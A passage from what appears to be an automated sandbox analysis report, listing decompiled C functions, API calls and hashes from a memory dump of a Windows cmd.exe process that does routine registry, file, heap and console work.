                                    • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,011D2178,00310030), ref: 011F9A2E
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011F9A3E
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: memset$DriveFullNamePathType
                                    • String ID:
                                    • API String ID: 3442494845-0
                                    • Opcode ID: 4a1655012cdb268907ade88d973b4a9eb78a32a82459891be4ad02e9f32c4f3f
                                    • Instruction ID: 71ba0e9fa0b896792e1cd5a68a757bbc540353d7ae598a7f4be2f3a570a5bef6
                                    • Opcode Fuzzy Hash: 4a1655012cdb268907ade88d973b4a9eb78a32a82459891be4ad02e9f32c4f3f
                                    • Instruction Fuzzy Hash: 26213571A0011E9BDF25DFE8EC89BBE77B8EB14308F0401A9A605E2141E775DA448B51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 79%
                                    			E011F5662(void* __ebx, void* __ecx, short* __edx, void* __edi, void* __esi, void* __eflags) {
                                    				long _t21;
                                    				long _t34;
                                    				void* _t44;
                                    
                                    				_push(0x1c);
                                    				_push(0x11fc100);
                                    				E011E7678(__ebx, __edi, __esi);
                                    				_t41 = __ecx;
                                    				 *((intOrPtr*)(_t44 - 0x2c)) = __ecx;
                                    				_t43 = 0;
                                    				 *(_t44 - 0x20) = 0;
                                    				 *(_t44 - 0x24) = 0;
                                    				 *(_t44 - 0x1c) = __ecx;
                                    				 *((intOrPtr*)(_t44 - 4)) = 0;
                                    				if(__edx == 0 ||  *__edx == 0) {
                                    					L4:
                                    					_t21 = RegQueryValueExW( *(_t44 - 0x1c), 0, 0, _t44 - 0x28, 0, _t44 - 0x24);
                                    					if(_t21 != 2) {
                                    						if(_t21 != 0) {
                                    							goto L3;
                                    						} else {
                                    							_t43 = E011E00B0( *(_t44 - 0x24));
                                    							 *(_t44 - 0x20) = _t43;
                                    							if(_t43 == 0) {
                                    								_push(8);
                                    								goto L11;
                                    							} else {
                                    								_t34 = RegQueryValueExW( *(_t44 - 0x1c), 0, 0, _t44 - 0x28, _t43, _t44 - 0x24);
                                    								if(_t34 != 0) {
                                    									E011E0040(_t43);
                                    									_t43 = 0;
                                    									 *(_t44 - 0x20) = 0;
                                    									_push(_t34);
                                    									goto L11;
                                    								}
                                    							}
                                    						}
                                    					} else {
                                    						_t43 = E011DDF40(0x11d24ac);
                                    						 *(_t44 - 0x20) = _t30;
                                    					}
                                    				} else {
                                    					_t21 = RegOpenKeyExW(__ecx, __edx, 0, 1, _t44 - 0x1c);
                                    					if(_t21 == 0) {
                                    						goto L4;
                                    					} else {
                                    						L3:
                                    						_push(_t21);
                                    						L11:
                                    						SetLastError();
                                    					}
                                    				}
                                    				 *((intOrPtr*)(_t44 - 4)) = 0xfffffffe;
                                    				E011F572C(_t41);
                                    				return E011E76BD(_t43);
                                    			}







                                    APIs
                                    • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000001,?,011FC100,0000001C,011F4C85), ref: 011F5695
                                    • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,00000000,?,00000000,?,011FC100,0000001C,011F4C85), ref: 011F56B0
                                    • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,00000000,?,00000000,?), ref: 011F56EF
                                    • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 011F570C
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: QueryValue$ErrorLastOpen
                                    • String ID:
                                    • API String ID: 4270309053-0
                                    • Opcode ID: 1443f0a14c73e48eea46206398f76b8e19f9dc0ab2dc8bf68a5fc5171db318e6
                                    • Instruction ID: a53c6d3f8941d9532d4033516e2c3ffa7e9753d75c1f43f1f85f549d2c8fe1c7
                                    • Opcode Fuzzy Hash: 1443f0a14c73e48eea46206398f76b8e19f9dc0ab2dc8bf68a5fc5171db318e6
                                    • Instruction Fuzzy Hash: E42150B1D0061AEFEF589FD998949EEBABEFF58654B404119EA11F3180DB748D408BA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 58%
                                    			E011D56AE(void* __ecx, intOrPtr __edx, FILETIME* _a4, intOrPtr _a8) {
                                    				struct _OVERLAPPED _v12;
                                    				short _t11;
                                    				void* _t14;
                                    				void* _t17;
                                    				void* _t27;
                                    				FILETIME* _t30;
                                    
                                    				_push(__ecx);
                                    				_push(__ecx);
                                    				_t27 = __ecx;
                                    				_t19 =  *((intOrPtr*)(__edx + 0x20));
                                    				_t11 = 0x1a;
                                    				_v12.InternalHigh = _t11;
                                    				if( *((intOrPtr*)(__edx + 0x20)) == 0) {
                                    					_t19 = __edx;
                                    				}
                                    				_t30 = _a4;
                                    				if(_t30 != 0xffffffff) {
                                    					if(E011F84D3(_t19) != 0) {
                                    						_t12 = E011E0178(_t12);
                                    						if(_t12 == 0) {
                                    							_t17 =  &(_v12.InternalHigh);
                                    							__imp___get_osfhandle(_t12);
                                    							_t12 = WriteFile(_t17, _t30, _t17, 1,  &_v12);
                                    						}
                                    					}
                                    					if(_t27 != 0 && ( *(_t27 + 0x1c) & 0x00000080) == 0 && E011E0178(_t12) == 0) {
                                    						_t14 =  *0x11fd55c; // 0x0
                                    						if(_t14 != 3 && _a8 != 0 && _t14 != 2) {
                                    							__imp___get_osfhandle(_a8);
                                    							SetFileTime(_t14, _t30, 0, 0);
                                    						}
                                    					}
                                    					_t11 = E011DDB92(_t30);
                                    				}
                                    				 *0x11fd56c =  *0x11fd56c + 1;
                                    				return _t11;
                                    			}










                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 05b765704793d8109c05aa092e338c3b8b31b5ea0fb48cb35bb1eeb7805d24e7
                                    • Instruction ID: cfc303fd70615c32d237e95fe4f00c6868202794dbac1804ea7544138eead1f6
                                    • Opcode Fuzzy Hash: 05b765704793d8109c05aa092e338c3b8b31b5ea0fb48cb35bb1eeb7805d24e7
                                    • Instruction Fuzzy Hash: D8110831A00B0CABDF2D9B98A82CBBE7BA9DB49328F14411AF911D70D0DB70D940CF91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 58%
                                    			E011FB91D(void* __ecx) {
                                    				signed int _v8;
                                    				int _v20;
                                    				char _v24;
                                    				signed int _v28;
                                    				void _v548;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				signed int _t18;
                                    				void* _t30;
                                    				WCHAR* _t31;
                                    				int _t32;
                                    				char _t34;
                                    				void* _t40;
                                    				void* _t42;
                                    				signed int _t43;
                                    
                                    				_t18 =  *0x11fd0b4; // 0x2833377e
                                    				_v8 = _t18 ^ _t43;
                                    				_v28 = _v28 & 0x00000000;
                                    				_t34 = 1;
                                    				_v20 = 0x104;
                                    				_t42 = __ecx;
                                    				_v24 = 1;
                                    				memset( &_v548, 0, 0x104);
                                    				if(E011E0C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) >= 0) {
                                    					_t30 = _v28;
                                    					if(_t30 == 0) {
                                    						_t30 =  &_v548;
                                    					}
                                    					__imp__GetVolumePathNameW(_t42, _t30, _v20);
                                    					if(_t30 == 0) {
                                    						L8:
                                    						_t34 = 0;
                                    					} else {
                                    						_t31 = _v28;
                                    						if(_t31 == 0) {
                                    							_t31 =  &_v548;
                                    						}
                                    						_t32 = GetDriveTypeW(_t31);
                                    						if(_t32 == 0 || _t32 == 4) {
                                    							goto L8;
                                    						}
                                    					}
                                    				}
                                    				__imp__??_V@YAXPAX@Z();
                                    				return E011E6FD0(_t34, _t34, _v8 ^ _t43, _t40, 0x104, _t42, _v28);
                                    			}




















                                    APIs
                                    • memset.MSVCRT ref: 011FB953
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • GetVolumePathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000001,-00000001,00000001,00000000,00000000), ref: 011FB98D
                                    • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 011FB9A5
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011FB9B9
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: memset$DriveNamePathTypeVolume
                                    • String ID:
                                    • API String ID: 1029679093-0
                                    • Opcode ID: fd7587cda096613f6aa5fd309938c613a9ed63bd64219a7e071c9a2ea557b6c4
                                    • Instruction ID: e7cc721ea439e4f1ce3fc2d05b13b0f85f9db091b48783af27da552c08689174
                                    • Opcode Fuzzy Hash: fd7587cda096613f6aa5fd309938c613a9ed63bd64219a7e071c9a2ea557b6c4
                                    • Instruction Fuzzy Hash: 72115471A04109ABDF24DAE9EC89BBFBBB8FB54348F48006DA614D3141EB34DA44C791
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 86%
                                    			E011F916C(void* __ecx, long __edx, DWORD* _a4, WCHAR* _a8, intOrPtr _a12) {
                                    				char _v8;
                                    				void* _t6;
                                    				int _t7;
                                    				void* _t14;
                                    				DWORD* _t15;
                                    				void* _t27;
                                    				void* _t28;
                                    				void* _t30;
                                    				intOrPtr _t31;
                                    				void* _t35;
                                    
                                    				_t15 = _a4;
                                    				_t6 =  &_v8;
                                    				_t31 = 0;
                                    				_t28 = __ecx;
                                    				__imp___get_osfhandle(0, _t27, _t30, _t14, __ecx, __ecx);
                                    				_t7 = WriteFile(_t6, __ecx, __edx, _t15, _t6);
                                    				if(_t7 == 0 || _t15 != _v8) {
                                    					L3:
                                    					 *0x1213cf0 = GetLastError();
                                    					E011DDB92(_a12);
                                    					if(E011E0178(E011DDB92(_t28)) == 0) {
                                    						DeleteFileW(_a8);
                                    					} else {
                                    						_t31 = 0x1d;
                                    					}
                                    					 *0x11fd5cc =  *0x11fd5cc & 0x00000000;
                                    					_t22 =  *0x1213cf0;
                                    					if( *0x1213cf0 == 0) {
                                    						_t22 = 0x70;
                                    						 *0x1213cf0 = _t22;
                                    					}
                                    					if( *0x11fd544 == 0) {
                                    						if(_t31 == 0) {
                                    							E011F985A(_t22);
                                    						}
                                    					} else {
                                    						_t31 = 0;
                                    					}
                                    					_t7 = E011F85E9(_t31, 1);
                                    					goto L13;
                                    				} else {
                                    					_t35 =  *0x11fd544 - _t31; // 0x0
                                    					if(_t35 == 0) {
                                    						L13:
                                    						return _t7;
                                    					}
                                    					goto L3;
                                    				}
                                    			}














                                    APIs
                                    • _get_osfhandle.MSVCRT ref: 011F9185
                                    • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011F8CA9,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 011F918D
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,00000000,00000000), ref: 011F91A4
                                    • DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,?,?,00000000,00000000), ref: 011F91D1
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: File$DeleteErrorLastWrite_get_osfhandle
                                    • String ID:
                                    • API String ID: 2448200120-0
                                    • Opcode ID: 255e9e86a95a52a0a4ffa4689dbf7546802cccb850d81249b8cf5a5657737c1e
                                    • Instruction ID: 499c3324025d5890067361c84f672c64880c49859f969036f7d5f2ee01bbea58
                                    • Opcode Fuzzy Hash: 255e9e86a95a52a0a4ffa4689dbf7546802cccb850d81249b8cf5a5657737c1e
                                    • Instruction Fuzzy Hash: ED11B2316042199BEF3DEB95F85CB7E7769EB9572DF00402DFA0482184DF709840C7A0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E011DAC30(void* __ecx) {
                                    				void* __edi;
                                    				void* __esi;
                                    				signed int _t16;
                                    				signed int _t17;
                                    				intOrPtr* _t18;
                                    				short _t30;
                                    				signed short _t32;
                                    				void* _t38;
                                    				void* _t42;
                                    
                                    				if(__ecx != 0) {
                                    					_t16 =  *(__ecx + 0x14);
                                    					if(_t16 != 0) {
                                    						_t16 = _t16 - 1;
                                    						 *(__ecx + 0x14) = _t16;
                                    						_t42 =  *(__ecx + 0x90 + _t16 * 4);
                                    						 *(__ecx + 0x90 + _t16 * 4) =  *(__ecx + 0x90 + _t16 * 4) & 0x00000000;
                                    						if(_t42 != 0) {
                                    							_t41 =  *_t42;
                                    							_t17 =  *( *_t42) & 0x0000ffff;
                                    							if(_t17 >= 0x61) {
                                    								__eflags = _t17 - 0x7a;
                                    								if(__eflags > 0) {
                                    									goto L4;
                                    								}
                                    								_t32 = _t17 + 0xffffffe0 & 0x0000ffff;
                                    								L5:
                                    								_t18 =  *0x1213cb8;
                                    								if(_t18 == 0) {
                                    									_t18 = 0x1213ab0;
                                    								}
                                    								if( *_t18 != _t32) {
                                    									E011F93E2((_t32 & 0x0000ffff) - 0x40, _t38);
                                    									_t41 =  *_t42;
                                    								}
                                    								E011E33FC(_t30, _t41, 1, _t41, _t42, 1);
                                    								RtlFreeHeap(GetProcessHeap(), 0,  *_t42);
                                    								E011DACFD( *((intOrPtr*)(_t42 + 4)));
                                    								E011DACD5( *((intOrPtr*)(_t42 + 4)));
                                    								 *0x1213cc9 =  *((intOrPtr*)(_t42 + 8));
                                    								 *0x1213cc8 =  *((intOrPtr*)(_t42 + 9));
                                    								return RtlFreeHeap(GetProcessHeap(), 0, _t42);
                                    							}
                                    							L4:
                                    							_t32 = _t17;
                                    							goto L5;
                                    						}
                                    					}
                                    				}
                                    				return _t16;
                                    			}













                                    APIs
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 011DAC8E
                                    • RtlFreeHeap.NTDLL(00000000), ref: 011DAC95
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 011DACBE
                                    • RtlFreeHeap.NTDLL(00000000), ref: 011DACC5
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: Heap$FreeProcess
                                    • String ID:
                                    • API String ID: 3859560861-0
                                    • Opcode ID: c47e4b0d38746c8a39c3f51b2aaa6e153df6026e224dccdaaff99d6d3f846062
                                    • Instruction ID: 6348abebaca485cdcab2db9325b7d55d81ac5ea499bb28ba1979bbe6f0d0d36c
                                    • Opcode Fuzzy Hash: c47e4b0d38746c8a39c3f51b2aaa6e153df6026e224dccdaaff99d6d3f846062
                                    • Instruction Fuzzy Hash: 701190316042409BDB28EF69B4587767FA5BF55238F24444DE58A8B285CB20D882CB61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E011E5D59(void* __ebx) {
                                    				intOrPtr _t4;
                                    				void* _t15;
                                    				intOrPtr* _t16;
                                    				void* _t23;
                                    				void* _t27;
                                    				intOrPtr* _t28;
                                    				void* _t29;
                                    
                                    				_t15 = __ebx;
                                    				_t28 =  *0x1213cb8;
                                    				_t16 = _t28;
                                    				if(_t28 == 0) {
                                    					_t16 = 0x1213ab0;
                                    				}
                                    				_t23 = _t16 + 2;
                                    				do {
                                    					_t4 =  *_t16;
                                    					_t16 = _t16 + 2;
                                    				} while (_t4 != 0);
                                    				_t27 = (_t16 - _t23 >> 1) + 1;
                                    				if(_t28 == 0) {
                                    					_t28 = 0x1213ab0;
                                    				}
                                    				E011E36CB(_t15, _t28,  *0x1213cc0, 0);
                                    				_t29 = HeapAlloc(GetProcessHeap(), 0, _t27 + _t27);
                                    				if(_t29 == 0) {
                                    					L11:
                                    					return 0;
                                    				} else {
                                    					_t20 =  *0x1213cb8;
                                    					if( *0x1213cb8 == 0) {
                                    						_t20 = 0x1213ab0;
                                    					}
                                    					E011E1040(_t29, _t27, _t20);
                                    					if(E011E5DEA(_t29) == 0) {
                                    						RtlFreeHeap(GetProcessHeap(), 0, _t29);
                                    						goto L11;
                                    					} else {
                                    						return 1;
                                    					}
                                    				}
                                    			}











                                    APIs
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,00000000), ref: 011E5D9D
                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 011E5DA4
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: Heap$AllocProcess
                                    • String ID:
                                    • API String ID: 1617791916-0
                                    • Opcode ID: 4ba294cf1c91c51b44c16f661740f0fed713df5f588078cb65855562d12d64c6
                                    • Instruction ID: 0f5a41989acc2c0d18a20331048d3f20a51405a75de3d5e67516c39bbb082f85
                                    • Opcode Fuzzy Hash: 4ba294cf1c91c51b44c16f661740f0fed713df5f588078cb65855562d12d64c6
                                    • Instruction Fuzzy Hash: D7114C39A04D1157CA7CEA99641CBBF2BD7FF94A28B1A0148ED075B24CCF228C438791
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 59%
                                    			E011E0100(void* __ecx, void* __edx) {
                                    				void* _t12;
                                    				long _t15;
                                    				void* _t16;
                                    				void** _t17;
                                    				void* _t19;
                                    				void* _t20;
                                    
                                    				_t16 = __ecx;
                                    				_t15 = __edx + 8;
                                    				_t20 = __ecx - 8;
                                    				if(_t15 < __edx) {
                                    					L12:
                                    					_push(0);
                                    					_push(8);
                                    					E011DC5A2(_t16);
                                    					return 0;
                                    				}
                                    				_t19 = HeapReAlloc(GetProcessHeap(), 0, _t20, _t15);
                                    				if(_t19 == 0) {
                                    					goto L12;
                                    				}
                                    				 *_t19 = _t15;
                                    				HeapSize(GetProcessHeap(), 0, _t19);
                                    				if(_t19 == _t20) {
                                    					L3:
                                    					_t3 = _t19 + 8; // 0x8
                                    					return _t3;
                                    				}
                                    				_t12 =  *0x1213cdc;
                                    				if(_t12 != _t20) {
                                    					if(_t12 == 0) {
                                    						goto L3;
                                    					} else {
                                    						goto L8;
                                    					}
                                    					while(1) {
                                    						L8:
                                    						_t17 = _t12 + 4;
                                    						_t12 =  *_t17;
                                    						if(_t12 == _t20) {
                                    							break;
                                    						}
                                    						if(_t12 != 0) {
                                    							continue;
                                    						}
                                    						goto L3;
                                    					}
                                    					 *_t17 = _t19;
                                    					goto L3;
                                    				}
                                    				 *0x1213cdc = _t19;
                                    				_t4 = _t19 + 8; // 0x8
                                    				return _t4;
                                    			}










                                    APIs
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000800,00000800,-00000004,-00000004,?,011DEBC3), ref: 011E0117
                                    • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 011E011E
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 011E0133
                                    • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 011E013A
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: Heap$Process$AllocSize
                                    • String ID:
                                    • API String ID: 2549470565-0
                                    • Opcode ID: b62ac5cf74e527bbaca5e0c54ed26ef5d1d018e2b61f228458600971850c4d61
                                    • Instruction ID: e2a7a4aa19491613736b4a0f1eaa3d6b69ab3a3bdc62ec0be1301525b8a0adc7
                                    • Opcode Fuzzy Hash: b62ac5cf74e527bbaca5e0c54ed26ef5d1d018e2b61f228458600971850c4d61
                                    • Instruction Fuzzy Hash: 9601F5723006019BDB25DB99FC8CF9A7BE9FB98765F250024F60ACA040DF71D884CB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 77%
                                    			E011F7DF1(unsigned int __ecx, void* __esi) {
                                    				signed int _v8;
                                    				signed short _v30;
                                    				struct _CONSOLE_SCREEN_BUFFER_INFO _v32;
                                    				struct _COORD _v36;
                                    				long _v40;
                                    				void* __ebx;
                                    				signed int _t11;
                                    				void* _t20;
                                    				int _t28;
                                    				void* _t34;
                                    				void* _t35;
                                    				void* _t37;
                                    				signed int _t38;
                                    
                                    				_t36 = __esi;
                                    				_t11 =  *0x11fd0b4; // 0x2833377e
                                    				_v8 = _t11 ^ _t38;
                                    				_t28 = __ecx;
                                    				if(((__ecx >> 0x00000004 ^ __ecx) & 0x0000000f) != 0) {
                                    					_push(__esi);
                                    					_t37 = GetStdHandle(0xfffffff5);
                                    					if(GetConsoleScreenBufferInfo(_t37,  &_v32) == 0) {
                                    						_t20 = 1;
                                    					} else {
                                    						_v36 = 0;
                                    						FillConsoleOutputAttribute(_t37, _t28, _v32.dwSize * _v30, _v36,  &_v40);
                                    						SetConsoleTextAttribute(_t37, _t28);
                                    						_t20 = 0;
                                    					}
                                    					_pop(_t36);
                                    				} else {
                                    					_t20 = 1;
                                    				}
                                    				return E011E6FD0(_t20, _t28, _v8 ^ _t38, _t34, _t35, _t36);
                                    			}

















                                    APIs
                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?,?,?,?,?,?,?,?,?,?,011EE18E), ref: 011F7E19
                                    • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,?,?,?,?,?,?,?,?,011EE18E), ref: 011F7E26
                                    • FillConsoleOutputAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,011EE18E), ref: 011F7E4A
                                    • SetConsoleTextAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,00000000,?,?,?,?,?,?,?,?,?,011EE18E), ref: 011F7E52
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: Console$Attribute$BufferFillHandleInfoOutputScreenText
                                    • String ID:
                                    • API String ID: 1033415088-0
                                    • Opcode ID: e76b61c33b418d439c95b661e9753e38eeb6ff7738a44a534bfc0fa5155928ce
                                    • Instruction ID: 2329a96a56c81efd7d0546561d12292f04eb504c50e147800c7a24bf01edc832
                                    • Opcode Fuzzy Hash: e76b61c33b418d439c95b661e9753e38eeb6ff7738a44a534bfc0fa5155928ce
                                    • Instruction Fuzzy Hash: C801F532A04128AF8F18DFB4AC489FFB7FCEF1D214B00012AF916D2180EB249E41C3A5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E011E6D00() {
                                    				signed int _t10;
                                    				intOrPtr* _t13;
                                    				intOrPtr* _t14;
                                    				void* _t15;
                                    				signed int _t18;
                                    				intOrPtr _t19;
                                    				intOrPtr _t22;
                                    				intOrPtr _t23;
                                    				void* _t25;
                                    
                                    				_t25 =  *0x11d0000 - 0x5a4d; // 0x5a4d
                                    				if(_t25 == 0) {
                                    					_t19 =  *0x11d003c; // 0xf8
                                    					__eflags =  *((intOrPtr*)(_t19 + 0x11d0000)) - 0x4550;
                                    					if( *((intOrPtr*)(_t19 + 0x11d0000)) != 0x4550) {
                                    						goto L1;
                                    					} else {
                                    						_t2 = _t19 + 0x11d0018; // 0xc0e010b
                                    						_t18 =  *_t2 & 0x0000ffff;
                                    						__eflags = _t18 - 0x10b;
                                    						if(_t18 == 0x10b) {
                                    							_t10 = 0;
                                    							__eflags =  *((intOrPtr*)(_t19 + 0x11d0074)) - 0xe;
                                    							if( *((intOrPtr*)(_t19 + 0x11d0074)) > 0xe) {
                                    								__eflags =  *(_t19 + 0x11d00e8);
                                    								goto L9;
                                    							}
                                    						} else {
                                    							__eflags = _t18 - 0x20b;
                                    							if(_t18 != 0x20b) {
                                    								goto L1;
                                    							} else {
                                    								_t10 = 0;
                                    								__eflags =  *((intOrPtr*)(_t19 + 0x11d0084)) - 0xe;
                                    								if( *((intOrPtr*)(_t19 + 0x11d0084)) > 0xe) {
                                    									__eflags =  *(_t19 + 0x11d00f8);
                                    									L9:
                                    									_t8 = __eflags != 0;
                                    									__eflags = _t8;
                                    									_t10 = _t10 & 0xffffff00 | _t8;
                                    								}
                                    							}
                                    						}
                                    					}
                                    				} else {
                                    					L1:
                                    					_t10 = 0;
                                    				}
                                    				 *0x11fd1b0 = _t10;
                                    				__set_app_type(E011E738E(1));
                                    				 *0x11fd518 =  *0x11fd518 | 0xffffffff;
                                    				 *0x11fd51c =  *0x11fd51c | 0xffffffff;
                                    				_t13 = __p__fmode();
                                    				_t22 =  *0x11fd4e0; // 0x0
                                    				 *_t13 = _t22;
                                    				_t14 = __p__commode();
                                    				_t23 =  *0x11fd4d4; // 0x0
                                    				 *_t14 = _t23;
                                    				_t15 = E011E75B0();
                                    				if( *0x11fd0b0 == 0) {
                                    					__setusermatherr(E011E75B0);
                                    				}
                                    				E011E75B3(_t15);
                                    				return 0;
                                    			}













                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: __p__commode__p__fmode__set_app_type__setusermatherr
                                    • String ID:
                                    • API String ID: 1063105408-0
                                    • Opcode ID: 3c5deb9ecaa0acb2f520498a0b6c59ca6dc1e01f3bdae5207fec74ced7b54b32
                                    • Instruction ID: 550b7e3ba0860eacf3b7868c957b2cfc2887db86a85fd678a6cf72e94b96051c
                                    • Opcode Fuzzy Hash: 3c5deb9ecaa0acb2f520498a0b6c59ca6dc1e01f3bdae5207fec74ced7b54b32
                                    • Instruction Fuzzy Hash: 61115A70904B04DAEB3C9FB4B04C23836E1FB18359FA4462EE066861D5DB3789C1CB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 75%
                                    			E011D43A0(void* __ecx, void* __eflags) {
                                    				struct _SECURITY_ATTRIBUTES _v16;
                                    				void* _t6;
                                    				long _t7;
                                    				void* _t10;
                                    				void* _t15;
                                    				void* _t17;
                                    
                                    				_v16.bInheritHandle = 1;
                                    				_v16.lpSecurityDescriptor = 0;
                                    				_v16.nLength = 0xc;
                                    				_t6 = CreateFileW(E011E22C0(_t10, __ecx), 0x40000000, 0,  &_v16, 4, 0x8000080, 0);
                                    				_t15 = _t6;
